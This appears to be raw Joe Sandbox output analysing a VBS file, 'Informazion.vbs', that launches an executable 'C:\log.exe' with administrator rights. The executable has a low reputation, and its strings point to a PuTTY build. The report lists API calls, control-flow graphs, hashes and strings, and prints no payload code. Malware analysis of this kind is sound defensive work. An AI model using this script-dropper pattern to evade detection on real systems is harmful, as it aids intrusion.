                  Start date:13/01/2023
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Informazion.vbs"
                  Imagebase:0x7ff76c320000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:1
                  Start time:16:04:36
                  Start date:13/01/2023
                  Path:C:\log.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\log.exe"
                  Imagebase:0xbb0000
                  File size:1477416 bytes
                  MD5 hash:AEB47B393079D8C92169F1EF88DD5696
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 0%, ReversingLabs
                  • Detection: 3%, Virustotal, Browse
                  Reputation:low


                    Execution Graph

                    Execution Coverage:0.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:16.3%
                    Total number of Nodes:294
                    Total number of Limit Nodes:23
50907->50901 50907->50903 50907->50904

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00BEB850: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    • GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 00BB473A
                    • GetProcAddress.KERNEL32(00000000,ToUnicodeEx), ref: 00BB4747
                    • GetProcAddress.KERNEL32(00000000,PlaySoundA), ref: 00BB4766
                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00BB4785
                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00BB4792
                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00BB479F
                    • GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 00BB47C8
                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 00BB47E7
                    • GetProcAddress.KERNEL32(00000000,AdjustWindowRectExForDpi), ref: 00BB47F4
                    • CoInitialize.OLE32(00000000), ref: 00BB4815
                    • MessageBoxA.USER32 ref: 00BB483F
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc$InitializeLibraryLoadMessage
                    • String ID: %s Fatal Error$AdjustWindowRectExForDpi$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MonitorFromPoint$MonitorFromWindow$PlaySoundA$ToUnicodeEx$shcore.dll$user32.dll$winmm.dll$3k
                    • API String ID: 2501503455-4166699630
                    • Opcode ID: 0bcac98597ee40e7410d3dad83198a0e7a09ce96f6bfd31466cc904d4ee8a5a7
                    • Instruction ID: 03e199b10535fc9e52f9b97744475bb19990421267265c7e7b0a1590b3fd6782
                    • Opcode Fuzzy Hash: 0bcac98597ee40e7410d3dad83198a0e7a09ce96f6bfd31466cc904d4ee8a5a7
                    • Instruction Fuzzy Hash: 3731E4F1A817916BC7027B726C5ABBE36E4FB02705F490575F80296292EFA48D00C796
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 00C16A2E
                    • ___from_strstr_to_strchr.LIBCMT ref: 00C16A7E
                    • GetUserNameA.ADVAPI32(00000000), ref: 00C16AA4
                    • GetUserNameA.ADVAPI32(00000000), ref: 00C16AD0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: NameUser$AddressProc___from_strstr_to_strchr
                    • String ID: GetUserNameExA$Logical name of remote host (e.g. for SSH key lookup):$secur32.dll$sspicli.dll
                    • API String ID: 1511097851-421106942
                    • Opcode ID: 9201fe4f8725ec5e866833d246ba1b1100a99c676d941024c2e18e6a1091e3b4
                    • Instruction ID: deffca15e6b6377e73f698859d33cb646e587def55175309c146da3d666a3b47
                    • Opcode Fuzzy Hash: 9201fe4f8725ec5e866833d246ba1b1100a99c676d941024c2e18e6a1091e3b4
                    • Instruction Fuzzy Hash: 1221ECB0A4434167EB106B25AC0BF6F36D49F42B04F09402CF846AB291EB659A84E793
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0009E645,00C4DFAD), ref: 00C4E523
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 429682c95cb6291783ec288c78264faea4b11727d7be351ccb1e330921a9275d
                    • Instruction ID: 36530c8f5b20bbc60e1646229ab178f087f592374d0ae0a895afe43570f8fdf3
                    • Opcode Fuzzy Hash: 429682c95cb6291783ec288c78264faea4b11727d7be351ccb1e330921a9275d
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00BEB850: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00BE4B8B
                    • GetProcAddress.KERNEL32(74160000,getaddrinfo), ref: 00BE4BA8
                    • GetProcAddress.KERNEL32(74160000,freeaddrinfo), ref: 00BE4BC3
                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00BE4BED
                    • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00BE4C07
                    • GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 00BE4C22
                    • GetProcAddress.KERNEL32(74160000,WSAAddressToStringA), ref: 00BE4C54
                    • GetProcAddress.KERNEL32(74160000,WSAAsyncSelect), ref: 00BE4C76
                    • GetProcAddress.KERNEL32(74160000,WSAEventSelect), ref: 00BE4C95
                    • GetProcAddress.KERNEL32(74160000,select), ref: 00BE4CB4
                    • GetProcAddress.KERNEL32(74160000,WSAGetLastError), ref: 00BE4CD3
                    • GetProcAddress.KERNEL32(74160000,WSAEnumNetworkEvents), ref: 00BE4CF2
                    • GetProcAddress.KERNEL32(74160000,WSAStartup), ref: 00BE4D11
                    • GetProcAddress.KERNEL32(74160000,WSACleanup), ref: 00BE4D30
                    • GetProcAddress.KERNEL32(74160000,closesocket), ref: 00BE4D4F
                    • GetProcAddress.KERNEL32(74160000,ntohl), ref: 00BE4D6E
                    • GetProcAddress.KERNEL32(74160000,htonl), ref: 00BE4D8D
                    • GetProcAddress.KERNEL32(74160000,htons), ref: 00BE4DAC
                    • GetProcAddress.KERNEL32(74160000,ntohs), ref: 00BE4DCB
                    • GetProcAddress.KERNEL32(74160000,gethostname), ref: 00BE4DEA
                    • GetProcAddress.KERNEL32(74160000,gethostbyname), ref: 00BE4E09
                    • GetProcAddress.KERNEL32(74160000,getservbyname), ref: 00BE4E28
                    • GetProcAddress.KERNEL32(74160000,inet_addr), ref: 00BE4E47
                    • GetProcAddress.KERNEL32(74160000,inet_ntoa), ref: 00BE4E66
                    • GetProcAddress.KERNEL32(74160000,inet_ntop), ref: 00BE4E85
                    • GetProcAddress.KERNEL32(74160000,connect), ref: 00BE4EA4
                    • GetProcAddress.KERNEL32(74160000,bind), ref: 00BE4EC3
                    • GetProcAddress.KERNEL32(74160000,setsockopt), ref: 00BE4EE2
                    • GetProcAddress.KERNEL32(74160000,socket), ref: 00BE4F01
                    • GetProcAddress.KERNEL32(74160000,listen), ref: 00BE4F20
                    • GetProcAddress.KERNEL32(74160000,send), ref: 00BE4F3F
                    • GetProcAddress.KERNEL32(74160000,shutdown), ref: 00BE4F5E
                    • GetProcAddress.KERNEL32(74160000,ioctlsocket), ref: 00BE4F7D
                    • GetProcAddress.KERNEL32(74160000,accept), ref: 00BE4F9C
                    • GetProcAddress.KERNEL32(74160000,getpeername), ref: 00BE4FBB
                    • GetProcAddress.KERNEL32(74160000,recv), ref: 00BE4FDA
                    • GetProcAddress.KERNEL32(74160000,WSAIoctl), ref: 00BE4FF9
                    • WSAStartup.WS2_32(00000202,00CB2C54), ref: 00BE5137
                    • WSAStartup.WS2_32(00000002,00CB2C54), ref: 00BE5155
                    • WSAStartup.WS2_32(00000101,00CB2C54), ref: 00BE5176
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc$Startup$LibraryLoad
                    • String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
                    • API String ID: 1450042416-3487058210
                    • Opcode ID: f51ba4aa0c0bfce657cbf2c63605d50073e1cf5568a757c86ddbe257850cda5f
                    • Instruction ID: 70cc154aa825624041b86d75c628a7073201e7e4b1c8544a3ae76fdb88657ff4
                    • Opcode Fuzzy Hash: f51ba4aa0c0bfce657cbf2c63605d50073e1cf5568a757c86ddbe257850cda5f
                    • Instruction Fuzzy Hash: 99E1DDB46417429BEB299F26EC69B2E3BA5FB04309F044B6DF813936E1DF75D4048B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • LoadIconA.USER32(000000C9), ref: 00BCD888
                    • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00BCD8A4
                    • MapDialogRect.USER32(?,00000003), ref: 00BCD8DB
                    • CreateWindowExA.USER32 ref: 00BCD91E
                    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BCD933
                    • SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 00BCD93B
                    • MapDialogRect.USER32(?,00000003), ref: 00BCD965
                    • CreateWindowExA.USER32 ref: 00BCD9B2
                    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BCD9C1
                    • SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 00BCD9C9
                    • _strrchr.LIBCMT ref: 00BCDACE
                    • _strlen.LIBCMT ref: 00BCDB06
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00BCDB32
                    • SendMessageA.USER32(?,00001102,-00000001,?), ref: 00BCDB56
                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00BCDBA9
                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00BCDBB6
                    • SendMessageA.USER32(?,0000110C,00000000,00000005), ref: 00BCDBE2
                    • GetDlgItem.USER32 ref: 00BCDC95
                    • DestroyWindow.USER32(00000000), ref: 00BCDC9C
                    • KillTimer.USER32(?,000004CE), ref: 00BCDCBE
                    • MessageBoxA.USER32 ref: 00BCDCE2
                    • SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 00BCDD36
                    • SetTimer.USER32(?,000004CE,000003E8,00000000), ref: 00BCDE1D
                      • Part of subcall function 00BCF180: SetWindowTextA.USER32(?,?), ref: 00BCF18F
                      • Part of subcall function 00BCF180: GetWindowLongA.USER32 ref: 00BCF1A1
                      • Part of subcall function 00BCF180: SetWindowLongA.USER32 ref: 00BCF1B0
                      • Part of subcall function 00BCF6E0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BCF70B
                      • Part of subcall function 00BCF6E0: GetClientRect.USER32(?,?), ref: 00BCF71D
                      • Part of subcall function 00BCF6E0: MapDialogRect.USER32(?), ref: 00BCF746
                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00BCDF3E
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00BCDF49
                    • SetFocus.USER32(?), ref: 00BCDF58
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$Send$Window$Rect$Dialog$CreateLongTimer$ClientDestroyFocusIconInvalidateItemKillLoadText_strlen_strrchr
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$b$firstpath$j == ctrl_path_elements(s->pathname) - 1
                    • API String ID: 3050031257-2030196855
                    • Opcode ID: 3715bed321de193834dc28282b393bd4108682b14d4590fd0b831f27624f8b95
                    • Instruction ID: 844b92db2e1d90dffca24d6c07d5f0ca4c6365a0b75fb7ac51b3fd3ce7c6f47d
                    • Opcode Fuzzy Hash: 3715bed321de193834dc28282b393bd4108682b14d4590fd0b831f27624f8b95
                    • Instruction Fuzzy Hash: C51204B5604345AFEB209F24DC86F6FB7E5EB84704F00487DFA499B2A1D7B1A904CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • LoadCursorA.USER32 ref: 00BF7FF9
                    • RegisterClassA.USER32 ref: 00BF801C
                    • CreateDialogParamA.USER32(?,?,?,00BF80F0,00000000), ref: 00BF805B
                    • SetWindowLongA.USER32 ref: 00BF8067
                    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BF809E
                    • IsDialogMessageA.USER32(00000000,?,?,00000000,00000000,00000000), ref: 00BF80AD
                    • DispatchMessageA.USER32 ref: 00BF80B4
                    • PostQuitMessage.USER32(?,?,00000000,00000000,00000000), ref: 00BF80C2
                    • DestroyWindow.USER32(00000000,?,00000000,00000000,00000000), ref: 00BF80C9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$DialogWindow$CallbackClassCreateCursorDestroyDispatchDispatcherLoadLongParamPostQuitRegisterUser
                    • String ID: "
                    • API String ID: 1405747859-123907689
                    • Opcode ID: 7345fd44d0d28b25adb4d36a74d7e8500e2865165a01e9e5a1f5be5f66b83baa
                    • Instruction ID: 2bf1db126c9ad3b341d3dd968d75bce3a6c7e95ef2f2c54ea48b1dc55205809f
                    • Opcode Fuzzy Hash: 7345fd44d0d28b25adb4d36a74d7e8500e2865165a01e9e5a1f5be5f66b83baa
                    • Instruction Fuzzy Hash: 0F311BB05483449FD7209F24DD48B5FBBF4FB8A708F50480DFA9A97290CB75A808CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • MapDialogRect.USER32(?), ref: 00BCF7BD
                    • CreateWindowExA.USER32 ref: 00BCF7F7
                    • SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00BCF807
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000116,?,?,BUTTON,50000007,00000000,00CA133C,?), ref: 00BCF833
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$CreateDialogMessageRectSend
                    • String ID: LISTBOX
                    • API String ID: 4261271132-1812161947
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 325 bcf180-bcf18b 326 bcf18d-bcf18f SetWindowTextA 325->326 327 bcf195-bcf19c call bbb3a0 325->327 326->327 330 bcf19e-bcf1b7 GetWindowLongA SetWindowLongA 327->330 331 bcf1b8-bcf1c6 GetDlgItem 327->331 332 bcf1cf-bcf1d0 331->332 333 bcf1c8-bcf1c9 DestroyWindow 331->333 333->332
                    APIs
                    Similarity
                    • API ID: Window$Long$DestroyItemText
                    • String ID:
                    • API String ID: 4119185043-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 334 bd31a0-bd31ac 335 bd31ae-bd31b4 334->335 336 bd31e4 334->336 337 bd31c0-bd31d6 call beafa0 335->337 338 bd31e6-bd31fa call c5d413 336->338 343 bd325d-bd3266 337->343 344 bd31dc-bd31e2 337->344 345 bd31fd-bd3206 338->345 343->345 348 bd3268-bd326b 343->348 344->336 344->337 346 bd3228-bd322d 345->346 347 bd3208-bd3226 345->347 350 bd3232-bd325c SendDlgItemMessageA * 2 346->350 347->350 348->338 349 bd3271-bd3275 348->349 349->345 351 bd3277 349->351 351->338
                    APIs
                    • SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00BD3245
                    • SendDlgItemMessageA.USER32(?,?,00000151,00000000,?), ref: 00BD3256
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD31EB
                    • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00BD31F0
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                    • API String ID: 3015471070-892283786
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 352 bd42c0-bd42c7 353 bd42c9-bd42d0 352->353 354 bd42e4-bd42f8 call beb850 352->354 356 bd4313-bd4315 353->356 357 bd42d2-bd42e3 call bbb160 SetCurrentProcessExplicitAppUserModelID 353->357 360 bd4308 354->360 361 bd42fa-bd4306 GetProcAddress 354->361 363 bd430a-bd4311 360->363 361->363 363->356 363->357
                    APIs
                    • SetCurrentProcessExplicitAppUserModelID.SHELL32(00000000,00BB46CA), ref: 00BD42D8
                    • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 00BD4300
                    Strings
                    • SetCurrentProcessExplicitAppUserModelID, xrefs: 00BD42FA
                    • Shell32.dll, xrefs: 00BD42E4
                    Similarity
                    • API ID: AddressCurrentExplicitModelProcProcessUser
                    • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32.dll
                    • API String ID: 3773935857-666802935
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 399 beb9b0-beb9d5 400 beba5e-beba60 399->400 401 beb9db-beb9e5 399->401 403 beba70-beba84 call c4dc50 400->403 402 beba06-beba12 401->402 405 beba14-beba2e RegCreateKeyExA 402->405 406 beba40-beba4e RegOpenKeyExA 402->406 408 beba50-beba53 405->408 409 beba30 405->409 406->408 410 beba62-beba67 406->410 412 beba55-beba5c RegCloseKey 408->412 413 beb9f0-beba04 408->413 409->410 410->403 411 beba69-beba6a RegCloseKey 410->411 411->403 412->413 413->400 413->402
                    APIs
                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00BEBA26
                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,0002001F), ref: 00BEBA4A
                    • RegCloseKey.ADVAPI32(?), ref: 00BEBA56
                    • RegCloseKey.ADVAPI32(?), ref: 00BEBA6A
                    Similarity
                    • API ID: Close$CreateOpen
                    • String ID:
                    • API String ID: 1299239824-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • CreateDialogParamA.USER32(0000006F,00000000,00BCD590,00000000,?), ref: 00BCD562
                    • ShowWindow.USER32(00000000,00000000), ref: 00BCD56D
                    • SetActiveWindow.USER32(00000000), ref: 00BCD574
                    • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00BCD57B
                    Similarity
                    • API ID: Window$ActiveCallbackCreateDialogDispatcherParamShowUser
                    • String ID:
                    • API String ID: 916146323-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 415 bd35f0-bd3600 416 bd3630-bd3649 call c5d413 415->416 417 bd3602-bd3604 415->417 422 bd364d-bd3657 416->422 419 bd3610-bd3626 call beafa0 417->419 426 bd3628-bd362e 419->426 427 bd364b 419->427 424 bd36ae-bd36ca call c5d413 call bb69a0 422->424 425 bd3659-bd365d 422->425 425->424 429 bd3664 425->429 430 bd3666-bd3676 call bd1d20 425->430 431 bd3690-bd36aa call bd1d20 425->431 426->416 426->419 427->422 429->430 439 bd3678-bd3683 SetDlgItemTextA call be9100 430->439 441 bd368b-bd368f 430->441 438 bd36ac 431->438 431->439 438->441 443 bd3688 439->443 443->441
                    APIs
                    Strings
                    • false && "bad control type in label_change", xrefs: 00BD36B8
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD3635, 00BD36B3
                    Similarity
                    • API ID: ItemText
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$false && "bad control type in label_change"
                    • API String ID: 3367045223-273940900
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 444 bd30f0-bd30fc 445 bd30fe-bd3104 444->445 446 bd3130 444->446 447 bd3110-bd3126 call beafa0 445->447 448 bd3132-bd3146 call c5d413 446->448 454 bd3128-bd312e 447->454 455 bd3182-bd318b 447->455 453 bd3149-bd3157 448->453 456 bd3159-bd3167 453->456 457 bd316a-bd3181 SendDlgItemMessageA 453->457 454->446 454->447 455->453 458 bd318d-bd3190 455->458 456->457 458->448 459 bd3192-bd3196 458->459 459->453 460 bd3198 459->460 460->448
                    APIs
                    • SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00BD3177
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD3137
                    • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00BD313C
                    Similarity
                    • API ID: ItemMessageSend
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                    • API String ID: 3015471070-892283786
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 461 bd2e90-bd2ea0 462 bd2ed8-bd2eda 461->462 463 bd2ea2-bd2ea8 461->463 465 bd2ee9-bd2efd call c5d413 462->465 464 bd2eb0-bd2ec6 call beafa0 463->464 470 bd2edc-bd2ee7 464->470 471 bd2ec8-bd2ece 464->471 472 bd2f00-bd2f14 SetDlgItemTextA 465->472 470->465 470->472 471->464 473 bd2ed0-bd2ed6 471->473 473->465
                    APIs
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2EEE
                    • c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00BD2EF3
                    Similarity
                    • API ID: ItemText
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                    • API String ID: 3367045223-2506229160
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,?,?,00C631F0,00000001,00000364,?,00000006,000000FF,?,00C5D423,00000003,?,?,00BEAE09), ref: 00C65C15
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,00C63C6B,19E850E8,?,00C63C6B,00000220,?,00C5DB94,19E850E8), ref: 00C649A3
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C16EA0: GetSystemDirectoryA.KERNEL32 ref: 00C16EB2
                      • Part of subcall function 00C16EA0: GetSystemDirectoryA.KERNEL32 ref: 00C16EF6
                      • Part of subcall function 00BE8420: _strlen.LIBCMT ref: 00BE8437
                      • Part of subcall function 00BE8420: _strlen.LIBCMT ref: 00BE8461
                      • Part of subcall function 00BE8420: _strcat.LIBCMT ref: 00BE848C
                      • Part of subcall function 00BE8420: _strlen.LIBCMT ref: 00BE8495
                      • Part of subcall function 00BE8420: _strcat.LIBCMT ref: 00BE84B2
                      • Part of subcall function 00BE8420: _strlen.LIBCMT ref: 00BE84BB
                    • LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    Similarity
                    • API ID: _strlen$DirectorySystem_strcat$LibraryLoad
                    • String ID:
                    • API String ID: 3346121862-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _strlen.LIBCMT ref: 00C09DF1
                      • Part of subcall function 00BE9280: _strlen.LIBCMT ref: 00BE928B
                    • _strlen.LIBCMT ref: 00C0BD7C
                      • Part of subcall function 00BFD350: _strlen.LIBCMT ref: 00BFD35B
                      • Part of subcall function 00C12540: _strlen.LIBCMT ref: 00C12546
